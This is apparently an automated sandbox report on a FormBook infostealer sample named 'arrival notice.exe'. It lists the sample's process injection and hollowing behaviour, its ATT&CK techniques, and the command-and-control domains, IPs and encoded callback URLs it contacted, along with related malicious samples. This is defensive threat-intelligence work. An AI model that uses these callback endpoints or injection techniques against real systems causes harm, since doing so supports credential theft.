          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483574 Sample: arrival notice.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 34 www.ifbrick.com 2->34 36 www.aboutacoffee.com 2->36 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 8 other signatures 2->46 11 arrival notice.exe 3 2->11         started        signatures3 process4 signatures5 56 Injects a PE file into a foreign processes 11->56 14 arrival notice.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.beerenhunger.info 217.160.0.150, 49819, 80 ONEANDONE-ASBrauerstrasse48DE Germany 17->28 30 ilovecoventry.com 184.168.131.241, 49814, 80 AS-26496-GO-DADDY-COM-LLCUS United States 17->30 32 5 other IPs or domains 17->32 38 System process connects to network (likely due to code injection or exploit) 17->38 21 colorcpl.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.arrival notice.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.aboutacoffee.com/n58i/?jrU4NBtp=iErxmr1uZwtSCCPIrNfUjuIgI02QQ4hyHDBIFJ5frhw4ANpZ5EdrzBW90%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.come.com0%URL Reputationsafe
          http://www.beerenhunger.info/n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.singisa4letterword.com/n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.tiro.comm0%Avira URL Cloudsafe
          http://www.ilovecoventry.com/n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.nordicbatterybelt.net/n58i/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ilovecoventry.com
          		184.168.131.241
          		truetrue
            		unknown
            www.beerenhunger.info
            		217.160.0.150
            		truetrue
              		unknown
              www.aboutacoffee.com
              		104.21.85.192
              		truefalse
                		unknown
                ext-sq.squarespace.com
                		198.185.159.144
                		truefalse
                  		high
                  www.ifbrick.com
                  		165.73.84.33
                  		truefalse
                    		unknown
                    www.singisa4letterword.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.ilovecoventry.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.petrosterzis.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.mybenefits51.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.beerenhunger.info/n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA==true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.singisa4letterword.com/n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLntrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.ilovecoventry.com/n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLntrue
                            • Avira URL Cloud: safe
                            		unknown
                            www.nordicbatterybelt.net/n58i/true
                            • Avira URL Cloud: safe
                            		low

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.403044652.000000000095C000.00000004.00000020.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.comarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.aboutacoffee.com/n58i/?jrU4NBtp=iErxmr1uZwtSCCPIrNfUjuIgI02QQ4hyHDBIFJ5frhw4ANpZ5EdrzBW9colorcpl.exe, 0000000A.00000002.618757124.00000000051D2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/bThearrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.tiro.comarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.come.comarrival notice.exe, 00000001.00000002.380922873.0000000000DD7000.00000004.00000040.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cThearrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleasearrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.tiro.commarrival notice.exe, 00000001.00000003.354453209.0000000000DDC000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fonts.comarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleasearrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sakkal.comarrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  198.185.159.144
                                                  		ext-sq.squarespace.comUnited States
                                                  		53831SQUARESPACEUSfalse
                                                  184.168.131.241
                                                  		ilovecoventry.comUnited States
                                                  		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                  217.160.0.150
                                                  		www.beerenhunger.infoGermany
                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:483574
                                                  Start date:15.09.2021
                                                  Start time:09:21:40
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 17s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:arrival notice.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:22
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@7/1@7/3
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 30.3% (good quality ratio 28.1%)
                                                  • Quality average: 74.5%
                                                  • Quality standard deviation: 30.4%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 73
                                                  • Number of non-executed functions: 125
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.210.154, 8.238.85.126, 8.248.145.254, 8.248.137.254, 8.253.145.120, 8.248.141.254, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209, 23.35.236.56, 20.50.102.62
                                                  • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  09:22:50API Interceptor1x Sleep call for process: arrival notice.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  198.185.159.144QMc4nO4xZi.exeGet hashmaliciousBrowse
                                                  • www.indoovo.com/mxwf/?wVnpf8E=uSNTKLl6qBOJEZtjvcALKWnkOU9rfnIlXuDLUXjOdV0jy+AZ+UCWPpKMscSmbwCXJ/XTUmljQw==&1bixUr=d8htnZ9Pl6
                                                  SdzD3TeTHx.exeGet hashmaliciousBrowse
                                                  • www.twerkwhileyouworkplanners.com/gz92/?TFND=9xfGkxHLYR0Fz8FGnJC5mr9wIEjkZjHVWVdCPASqhemWLUdNaavVqWbyIST7ay8xueD4&a6V4_x=h0D49JWPj0G48L8p
                                                  prueba23.exeGet hashmaliciousBrowse
                                                  • www.libertyhousesavannah.com/a0ce/?nPw=uvfD0PDPNVLPD&_FNTov=P0NPAKUtJV/Kt4w/e3Xf/GvOO0LXSIYXMgJ8+RfIhDGkLNP2bO8NLS3jsvj9siKx426nZQ==
                                                  prueba22.exeGet hashmaliciousBrowse
                                                  • www.libertyhousesavannah.com/a0ce/?O2Mp=P0NPAKUtJV/Kt4w/e3Xf/GvOO0LXSIYXMgJ8+RfIhDGkLNP2bO8NLS3jsvj9siKx426nZQ==&cT_T=9ra0stsXZtHLPLNp
                                                  Order 45789011.exeGet hashmaliciousBrowse
                                                  • www.chilliwacktraumacleaning.com/kmb0/?4h94O6Q=G6hPUcCybaaG/hO7+YUIn97AcIkmTVfl69GgLEXr0cNfRnDOVLYB7UbV6nUR7SpzbCwM&j2Jx2V=oTNlAdvh
                                                  DHL Arrival Parcel.exeGet hashmaliciousBrowse
                                                  • www.ggoldcollections.com/i6sj/?XdsHzt=9rSHYnxxm&lR-P32O=PkEBIlPehZAtzWhv92QU+5CoF9aLMdZOJkwUK7vgIiMkOHVOLF8pls2cLghb1JbAMoLY
                                                  Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                                  • www.ggoldcollections.com/i6sj/?u8XH=CRnLPd&5jOdAhBH=PkEBIlPehZAtzWhv92QU+5CoF9aLMdZOJkwUK7vgIiMkOHVOLF8pls2cLjBhlY74WPqf
                                                  DHL-AWB 9245125956.exeGet hashmaliciousBrowse
                                                  • www.zoemoonarnott.com/rvoe/?o6Fd=5jxPUdI8PRkdIno&m0GH=IbRecDplA1UYOYz3kRZZCPl3KjmqEqFSmhN8VOT2s5QnFr5hz3FeeOgU0DB4uZ9xp5fX
                                                  franke-sourcing-000990000.exeGet hashmaliciousBrowse
                                                  • www.katiedalymedia.com/qw8m/?6l-=o0GxXpO&O0D=kzWI0aXJsowl7Q2DxzLl4ORhRs6OUjOKr+i/uiNDYfI2pxlLmTHHAxmWg6sXQzlf1yyVx2nt5A==
                                                  Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                                  • www.ggoldcollections.com/i6sj/?6lrd=UDKXHr4H&v6ALP=PkEBIlPehZAtzWhv92QU+5CoF9aLMdZOJkwUK7vgIiMkOHVOLF8pls2cLjBhlY74WPqf
                                                  DHL Shipping INV#BL.exeGet hashmaliciousBrowse
                                                  • www.davidedigiovanni.com/u86g/?8pOh=JXYxqbJx&VH=qlrC5BVj2uO1vIa/4FjblVhI4D0r2JxPcCqcAWwxCPXFoIm8OiNSFO6wxBUsaLUgpo6ow0rnQQ==
                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                  • www.immersebyacfw.com/bp39/?3frL=VOCEUuO4ZYVO+Sz7aUGnxp7aW7rEFZj0LgCAtrppZ7TJ0wIN0dj+kPe8zpu568CIStgF&hP=y48t2bX
                                                  QUOTATION TABULATION REQUEST FORM.exeGet hashmaliciousBrowse
                                                  • www.spellboundgardens.com/gm9w/?4hr8s8=5elLm+BCnHDQf99dJGFsJZAw/PkaQzh4mWmaALjZsfvvOqmP56ZR3XllSPGsVqUip4Z6&d8_=xV08
                                                  PI001.exeGet hashmaliciousBrowse
                                                  • www.middleschoolmathdoctor.com/h2m4/?d2JlP0UX=FWW2/87DOx3yn1E4mdD4pYB6brXJRrwiwCmlh6dAZlmCJdahgBf6kbTV24sz2CZJvRRW&0R=JL0PA2
                                                  ORDER 922021.xlsxGet hashmaliciousBrowse
                                                  • www.camelotandco.com/r48a/?l6=lyfEwo1d7bLdUklLYfuCLWLQ7RxyeouX9tQCZtW5QCXIdeUj7v32M17ZPseEDUhxqG+L2w==&hP=5jClM
                                                  DutkUUqm2mZl3Fl.exeGet hashmaliciousBrowse
                                                  • www.twerkwhileyouworkplanners.com/gz92/?sBZ8=RnH82vm&4hAl=9xfGkxHLYR0Fz8FGnJC5mr9wIEjkZjHVWVdCPASqhemWLUdNaavVqWbyISTRFCMxqcL4
                                                  CAGE8UjZmt.exeGet hashmaliciousBrowse
                                                  • www.socialbutterfliesny.com/sqwo/?BTcPlT=E1tPMx1gVRUljelyPmsntZlI55/upwId2ZRGPeIARtBlP/FcKJAdXYet4kqbLCehEkn9dFLfvQ==&Lhh8C=k6AlV0GXb27dex6P
                                                  xAXTvjBdeI.exeGet hashmaliciousBrowse
                                                  • www.totally-seo.com/p2io/?l0G0=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&WT1l=VVMX3Bmp6JB8mDYp
                                                  Invoice pdf.exeGet hashmaliciousBrowse
                                                  • www.supermomsd.com/k8b5/?4hRxq=Y820yCzEv8Zok6/rbESMw/jgEfrPJMeYEWFVqfwsg95Tr8WQZzHWzH7vgE8j94K4IFL9&5jb4v=Q0Gl485
                                                  SOA.exeGet hashmaliciousBrowse
                                                  • www.immersebyacfw.com/bp39/?3fkpkd=4hKTJV&FL=VOCEUuO4ZYVO+Sz7aUGnxp7aW7rEFZj0LgCAtrppZ7TJ0wIN0dj+kPe8zpuTlMyIWvoF

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  ext-sq.squarespace.comQMc4nO4xZi.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SdzD3TeTHx.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  prueba23.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  prueba22.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL Arrival Parcel.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL-AWB 9245125956.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL Shipping INV#BL.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  QUOTATION TABULATION REQUEST FORM.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
